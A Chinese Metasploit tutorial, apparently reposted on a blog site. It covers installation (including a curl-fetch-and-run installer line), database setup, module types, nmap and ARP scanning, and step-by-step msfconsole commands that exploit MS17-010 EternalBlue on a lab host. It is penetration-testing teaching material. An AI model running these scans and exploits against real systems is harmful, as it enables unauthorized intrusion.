MSF之信息收集及漏洞利用

news2024/12/23 18:48:12

MSF之信息收集及漏洞利用

  • 一、Metasploit简介
  • 二、Metasploit安装
  • 三、安装postgresql数据库
  • 四、KaIi-msfdb-Postgresql报错排查处理
  • 五、Metasploit-启动
  • 六、Metasploit-目录结构
  • 六、Metasploit-模块
  • 七、Metasploit-信息收集
    • 7.1、db_nmap/nmap
    • 7.2、Metasploit auxiliary
      • 7.2.1、端口扫描
      • 7.2.2、主机发现
  • 八、永恒之蓝

一、Metasploit简介

metasploit是什么?

Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞,是一款专业级漏洞攻击工具。

二、Metasploit安装

1、在Linux/mac0S上安装Metasploit,这里有官方提供的脚本,可以一键式安装。

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall

2、Debian/Ubuntu软件包位于https://apt.metasploit.com
3、Cent0S/Redhat/Fedora软件包位于https://rpm.metasploit.com

  • ubuntu安装
    • https://apt.metasploit.com/下载MSF的deb安装包。
    • 在终端运行:dpkg -i metasp|oit-framework_6.0.7+20200916102431_1rapid7-1_amd64.deb
    • 就已经安装好了,数据库的安装看下面的步骤
  • Centos安装
    • https://rpm.metasploit.com下载rpm安装包
    • 在终端运行:rpm -i metasploit-framework-6.0.7+20200916102441~1rapid7-1.e16.x86_64.rpm

4、kali-metasploit更新:

msfconsole -v				#查看版本
apt-get update
apt-get install metasploit-framework

三、安装postgresql数据库

1、msf使用的是postgresql数据库,如果没有的话需要先安装。
2、安装数据库的时候会自动创建系统用户postgres,数据库用户postgres,数据库postgres

1、apt-get install postgresql		#安装postgresql数据库
2、su - postgres					#切换到postgres用户
3、psql								#登陆postgresql数据库,首次登陆没有密码
4\password postgres				#修改数据库用户postgres的密码

在这里插入图片描述

3、msf使用数据库

1、msfconsole										#启动msf
2、db_connect postgres:hehehe@127.0.0.1/test		#用户名,密码,地址
3、db_status										#查看数据库连接状态
  • 在Kali里面,Msf和数据库已经原本就安装好了。
  • 使用数据库之前必须先开启postgresql服务器。
1、systemctl start postgresql						#开启数据库
2、systemctl status postgresql						#查看数据库状态

四、KaIi-msfdb-Postgresql报错排查处理

  • Postgresql日志文件:
ls /var/log/postgresql
tail /var/log/postgresql/postgresql-15-main.log

在这里插入图片描述

五、Metasploit-启动

  • 1、systemctl start postgresql 开启数据库
  • 2、msfdb init 初始化数据库

在这里插入图片描述

  • 3、msfconsole 启动

Msfconsole主要用于:
1、管理Metasploit数据库
2、管理会话
3、配置启动Metasploit模块

在这里插入图片描述

六、Metasploit-目录结构

kali-metasploit框架目录路径:
/usr/share/metasploit-framework/

在这里插入图片描述

  • data:包含metasploit用于存储某些漏洞、单词列表、图像等所需二进制文件的可编辑文件。
  • documentation:包含框架的可用文档。
  • lib:metasploit的库文件夹。
  • plugins:用来存放metasploit的插件。(.rb文件是一个包含Ruby程序/脚本源代码的文本文件。)
  • scripts:用来存放metasploit的脚本,包括meterpreter及其它脚本。
  • tools:存放多种的命令行实用程序。
  • modules:存储metasploit的模块文件。

六、Metasploit-模块

在这里插入图片描述

modules-msf核心:

  • auxiliary:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等)
  • exploits:漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类。
  • payloads:攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shel l的代码。
  • post:后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等。
  • encoders:编码器模块,主要包含各种编码工具,对pay l oadi进行编码加密,以便绕过入侵检测和过滤系统。
  • evasion:躲避模块,用来生成免杀payload。
  • nops:由于IDS/IPS会检查数据包中不规则的数据,在某些情况下,比如针对溢出攻击,某些特殊滑行字符串(N0PS x90x90…)则会因为被拦截而导致攻击失效。

七、Metasploit-信息收集

7.1、db_nmap/nmap

  • db_nmap nmap扫描
  • -T[0-5] 默认为T3,T4表示最大TCP扫描延迟为10ms
  • -sS TCP SYN扫描
  • -sA TCP ACK扫描
  • -sT TCP扫描
  • -A 打开操作系统探测和版本探测
  • hosts 查看当前工作区所有主机
  • services 查看所有服务

在这里插入图片描述
在这里插入图片描述

  • nmap扫描一次扫描1000个端口,上图显示982个端口是关闭的,说明有18个端口是开启的。
  • db_nmapnmap不同点:使用db_nmap,结果会保存在hosts数据库中。
    在这里插入图片描述

7.2、Metasploit auxiliary

端口扫描&主机发现

  • search 搜索msf中相关模块。
    • search portscan 端口扫描
    • search discovery 主机发现
  • use module使用msf中相关模块。
    • use auxiliary/scanner/portscan/tcp tcp端口扫描
    • use auxiliary/scanner/discovery/arp_sweep arp扫描存活探测
  • options/show options 查看模块设置,yes是必填的
  • set rhosts 设置模块必选项
  • run/exploit 运行模块

7.2.1、端口扫描

msf6 >search portscan
#使用模块
msf6 >use auxiliary/scanner/portscan/tcp
## 或者use 5

在这里插入图片描述

msf6 auxiliary(scanner/portscan/tcp) > options

在这里插入图片描述

msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.9.131
rhosts => 192.168.9.131
msf6 auxiliary(scanner/portscan/tcp) > run

在这里插入图片描述

7.2.2、主机发现

在TCP/IP网络环境中,一台主机在发送数据帧前需要使用ARP(Address Resolution Protocol,地址解析协议)将目标IP地址转换成MAC地址,这个转换过程是通过发送一个ARP请求来完成的。如IP为A的主机发送一个ARP请求获取IP为B的MAC地址,此时如果IP为B的主机存在,那么它会向A发出一个回应。因此,可以通过发送ARP请求的方式很容易地获取同一子网上的活跃主机情况,这种技术也称为ARP扫描。

msf6 >search discovery

在这里插入图片描述

msf6 >use 0

在这里插入图片描述

msf6 auxiliary(scanner/discovery/arp_sweep) > options
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.9.1/24
rhosts => 192.168.9.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > run

在这里插入图片描述

在这里插入图片描述

八、永恒之蓝

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

检测ms17_010

1、利用msf扫描目标主机开放端口。
在这里插入图片描述
2、发现445端口开放,进一步探测目标是否存在永恒之蓝漏洞,使用漏洞检测模块。

  • search ms17_010 搜索相关模块
  • use auxiliary/scanner/smb/smb_ms17_010_eternablue 使用辅助模块检测漏洞
  • options/show options 查看模块/payload设置
  • set rhosts 192.168.9.131 设置模块必选项
  • run/exploit 运行模块
msf6 > search ms17_010
msf6 > use 3

在这里插入图片描述

msf6 auxiliary(scanner/smb/smb_ms17_010) > options
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.9.131
rhosts => 192.168.9.131
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

在这里插入图片描述
3、发现存在永恒之蓝漏洞,使用漏洞利用模块。

msf6 auxiliary(scanner/smb/smb_ms17_010) > use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > options   

在这里插入图片描述

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.9.131
rhosts => 192.168.9.131
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

在这里插入图片描述
4、成功。
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/708778.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【STM32】步进电机及其驱动(ULN2003驱动28BYJ-48丨按键控制电机旋转)

本篇文章包含的内容 一、步进电机的结构和工作原理1.1 步进控制系统的组成1.2 步进电机简介1.3 步进电机的分类1.4 步进电机的工作原理1.4.1 单极性步进电机(5线4相)1.4.2 双极性步进电机(4线2相)1.4.3 细分器驱动原理 1.5 步进电…

hcia回顾复习

一、OSI七层参考模型 OSI/RM 开放式系统互联参考模型 由ISO ---- 国际标准化组织 — 1979提出 核心思想 分层 :上层协议再下层协议提供服务的基础上再提供增值服务。 应用层 — 提供各种应用服务.可以将抽象语言转换为编码 .应用程序 APP:通过人机交互提供&#xff…

Win10打字输入法不显示输入框怎么办?

Win10的打字输入法是我们日常计算机使用中必不可少的工具之一,然而,有时候在使用过程中可能会遇到打字输入法不显示输入框的问题,这给我们的输入和操作带来了很大的困扰,如果您也遇到了这个问题,不要担心,以…

Linux--获取某个区间文本的指令:head和tail

Linux--获取文本前n行的指令&#xff1a;head 语法&#xff1a; head 选项 文件名 功能&#xff1a; head 用来显示档案的开头至标准输出中&#xff0c;默认head命令打印其相应文件的开头10行。 选项&#xff1a; -n <行数> 显示的行数 示例&#xff1a; ①生成默…

【UE5 Cesium】05-Cesium for Unreal 在子关卡中添加Actor

上一篇&#xff1a;【UE5 Cesium】04-Cesium for Unreal 将不同地区的倾斜摄影作为不同子关卡 步骤 首先将关卡切换到“DenverRooftop” 添加一个“立方体” 将关卡切换到“Globe” 然后再向场景中添加一个“椎体” 此时如果我们将关卡切换到“Boston”&#xff0c;只能看到“…

如何高效获取嵌入式系统知识和技能

学习嵌入式系统的方法&#xff1a; 设定明确的目标&#xff1a;在学习嵌入式系统之前&#xff0c;明确自己的学习目标和期望结果。这可以帮助你更有针对性地选择学习材料和项目&#xff0c;并保持专注和动力。 分解学习计划&#xff1a;将学习过程分解成小的可管理的任务和阶段…

SQL注入经验方法总结

SQL注入 先判断是哪种数据库。再进行后续操作。 SQL注入漏洞产生的原理 web应用程序&#xff0c;对用户输入的语句没有做严格的过滤&#xff0c;导致被输入的语句被拼接成恶意代码的SQL语句进入数据库中查询&#xff0c;修改信息等。 所以SQL注入漏洞需要的条件&#xff1a…

chatglm2 本地部署中遇到的问题

在本地GPU部署的时候&#xff0c;发现了报错&#xff0c; ModuleNotFoundError: No module named transformers_modules.chatglm2-6b 但是自己路径都是正确的&#xff0c; 确实是按照双斜杠来写的路径。 但依旧报错 最后发现是安装的 transformers 包的版本太新导致的。 …

抖音SEO账号矩阵系统源码

一、抖音SEO账号矩阵系统源码思路 1. 数据采集与分析 2. 排名算法设计 3. 用户管理模块 4. 内容推荐系统 二、抖音矩阵系统源码功能概述 &#xff08;1&#xff09;多平台多账号管理,支持抖音&#xff0c;快手&#xff0c;好看视频&#xff0c;B站&#xff0c;西瓜&#x…

jdbc获取数据库元数据信息

DatabaseMetaData 接口&#xff1a; 获取数据库&#xff0c;&#xff0c;&#xff0c;表&#xff0c;&#xff0c;列&#xff0c;&#xff0c;等元数据信息 jdbc使用&#xff1a; // 获取一个连接 Connection connection DriverManager.getConnection(url,username,password)…

葡萄酒数据可视化分析

葡萄酒数据可视化分析 必应壁纸供图 数据集&#xff1a;https://download.csdn.net/download/weixin_53742691/87982219 import pandas as pd import seaborn as sns import matplotlib.pyplot as pltwine pd.read_csv("wine_quality/wine_edited.csv") wine.hea…

chatgpt赋能python:用Python来制作动画

用Python来制作动画 Python是一种高级编程语言&#xff0c;可以用于许多任务&#xff0c;包括数据分析、网络编程&#xff0c;甚至是制作动画。在这篇文章中&#xff0c;我们将讨论如何使用Python来制作动画。 Python中的动画库 Python中有许多用于制作动画的库。其中最流行…

论文笔记--Goat: Fine-tuned LLaMA Outperforms GPT-4 on Arithmetic Tasks

论文笔记--Goat: Fine-tuned LLaMA Outperforms GPT-4 on Arithmetic Tasks 1. 文章简介2. 文章概括3 文章重点技术3.1 LLM的选择3.2 算数任务的可学习性(learnability)3.3 大模型的加减乘除 4. 数值实验结果5. 文章亮点6. 原文传送门7. References 1. 文章简介 标题&#xff…

选读SQL经典实例笔记01_检索和排序

1. 在WHERE子句中引用别名列 1.1. 当表里的某些列没有被恰当命名的时候&#xff0c;这个技巧尤其有用 1.2. sql select sal as salary, comm as commissionfrom empwhere salary &#xff1c; 5000 1.3. 内嵌视图 1.3.1. sql select *from (select sal as salary, comm …

按 DDD 设计这个新项目

一、专业术语 各种服务 IAAS&#xff1a;基础设施服务&#xff0c;Infrastructure-as-a-service PAAS&#xff1a;平台服务&#xff0c;Platform-as-a-service SAAS&#xff1a;软件服务&#xff0c;Software-as-a-service 二、架构演变 图片 从图中已经可以很容易看出架…

R 语言 ggplot2 PCA 主成分分析(虚拟数据集)

生成虚拟数据集 library(ggplot2)data.matrix <- matrix(nrow 100, ncol 10)colnames(data.matrix) <- c(paste("wt",1:5,sep ""),paste("ko",1:5,sep "") )rownames(data.matrix) <- paste("gene",1:100,sep…

vue安装|win11系统

1.安装node.js https://nodejs.org/en/download 下载对应系统对应位数的.msi文件&#xff0c; 下载完成后&#xff0c;一直点击next进行安装 自定义安装路径&#xff0c;我的安装路径为**“D:\nodejs”** # 检查node.js版本 node -V# 检查npm版本 npm -V在D:\nodejs下新建两…

DataGrip连接clickhouse

首先保证ClickHouse启动了&#xff1a; 先建一个工程&#xff1a; 建立数据库源连接&#xff1a; 用户名和密码可以不写&#xff1a; 添加ClickHouse驱动&#xff1a;最好不用自己下载的驱动&#xff0c;会出现一些错误以及连接失败&#xff0c;用在线下载的。 选择一个版…

《深入浅出SSD:固态存储核心技术、原理与实战》----学习记录(三)

第3章 SSD存储介质&#xff1a;闪存 3.1 闪存物理结构 3.1.1 闪存器件原理 1978年诞生的世界上第一块固态硬盘就是基于DRAM的。但由于保存在DRAM中的数据有掉电易失性&#xff0c;当然还有成本因素&#xff0c;所以现在的固态硬盘一般都不采用DRAM&#xff0c;而是使用闪存…

JS对象的浅拷贝与深拷贝

一. 浅拷贝 定义&#xff1a;浅拷贝是按位拷贝对象&#xff0c;它会创建一个新对象&#xff0c;这个对象有着原始对象属性值的一份精确拷贝。如果属性是基本类型&#xff0c;拷贝的就是基本类型的值&#xff1b;如果属性是内存地址&#xff08;引用类型&#xff09;&#xff0c…